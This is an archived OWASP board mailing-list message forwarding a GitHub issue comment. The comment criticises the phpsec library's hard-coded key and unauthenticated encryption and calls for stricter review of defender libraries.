[Owasp-board] Fwd: [phpsec] confidentialString function uses hard-coded key (#108)
johanna curiel curiel
johanna.curiel at owasp.org
Wed Nov 25 15:47:27 UTC 2015
This is why higher criteria and revision is needed for defender library
See comment of user.
---------- Forwarded message ----------
From: Scott <notifications at github.com>
Date: Wed, Nov 25, 2015 at 11:14 AM
Subject: Re: [phpsec] confidentialString function uses hard-coded key (#108)
To: OWASP/phpsec <phpsec at noreply.github.com>
Cc: owaspjocur <johanna.curiel at owasp.org>
Oh my god OWASP, why are you shipping your own broken cryptography library?
Hey, I heard you like PHP Object Injection from chosen-ciphertext attacks,
because you're not authenticating your ciphertext at all.
I really hope nobody uses this, and instead opts for a sane authenticated
encryption library, such as defuse/php-encryption
Reply to this email directly or view it on GitHub
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Owasp-board